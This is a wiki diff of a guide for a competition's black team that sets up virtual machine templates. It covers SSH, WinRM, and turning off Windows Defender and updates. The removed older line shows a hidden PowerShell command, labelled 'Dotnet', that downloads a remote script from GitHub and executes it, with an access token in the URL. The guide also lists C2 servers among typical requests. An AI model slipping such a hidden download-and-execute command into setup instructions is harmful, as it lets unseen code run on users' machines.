Differences
This shows you the differences between two versions of the page.
| Both sides previous revision Previous revision Next revision | Previous revision Next revision Both sides next revision | ||
|
guides:lockdown_black_team [2019/10/27 18:27] aibekzhy |
guides:lockdown_black_team [2020/02/14 19:51] aibekzhy |
||
|---|---|---|---|
| Line 10: | Line 10: | ||
| To make the deployment with Ansible possible we need to ensure that requirements for deployment templates are satisfied. Please check the TEMPLATE REQUIREMENTS section for more info | To make the deployment with Ansible possible we need to ensure that requirements for deployment templates are satisfied. Please check the TEMPLATE REQUIREMENTS section for more info | ||
| + | |||
| + | Black Team Should manually log in to EVERY computer to test passwords, and ensure that the applications are cached, and VMs are fast when competitors are using them. | ||
| ===== TEMPLATE REQUIREMENTS ===== | ===== TEMPLATE REQUIREMENTS ===== | ||
| Line 16: | Line 18: | ||
| - Copy Paste Enabled | - Copy Paste Enabled | ||
| - Graphics to support Full HD/Automatic Graphics Detection | - Graphics to support Full HD/Automatic Graphics Detection | ||
| + | - Ensure time Synchronized | ||
| + | - Potentially disable DHCP | ||
| * Linux: | * Linux: | ||
| Line 21: | Line 25: | ||
| - Depending on how old ansible is, try to install python2 and python3 | - Depending on how old ansible is, try to install python2 and python3 | ||
| - SSH server (installed, enabled, running) | - SSH server (installed, enabled, running) | ||
| + | - Decrease swappiness to 10 | ||
| - Ubuntu specific: | - Ubuntu specific: | ||
| - Ensure networkd is a renderer | - Ensure networkd is a renderer | ||
| + | - Install resolvconf to configure DNS on 18.* | ||
| - Fedora specific: | - Fedora specific: | ||
| - Depending on implementation look into installing network-scripts | - Depending on implementation look into installing network-scripts | ||
| Line 34: | Line 40: | ||
| - Ensure that Windows Remote Management service is started Automatically | - Ensure that Windows Remote Management service is started Automatically | ||
| - Enable Ping via Firewall (Allow ICMP Packets) | - Enable Ping via Firewall (Allow ICMP Packets) | ||
| - | - Disable Windows Defender (Registry/GPO) | + | - Disable/Uninstall Windows Defender (Registry/GPO) |
| - Disable Windows Updates (Registry/GPO/Services) | - Disable Windows Updates (Registry/GPO/Services) | ||
| - Ensure Sleep is disabled | - Ensure Sleep is disabled | ||
| Line 63: | Line 69: | ||
| Things that are typically requested: | Things that are typically requested: | ||
| - | * Windows: Dotnet (powershell.exe -Sta -Nop -w hidden -Command "IEX(IWR 'https://raw.githubusercontent.com/NotoriousRebel/temppp/master/builder.ps1?token=AIVA5C62REQKCZAXPVLPOUS5TAWXC' -UseBasicParsing)") | + | * Windows: Dotnet https://dotnet.microsoft.com/download |
| * C2 Servers | * C2 Servers | ||
| ===== Naming Conventions ===== | ===== Naming Conventions ===== | ||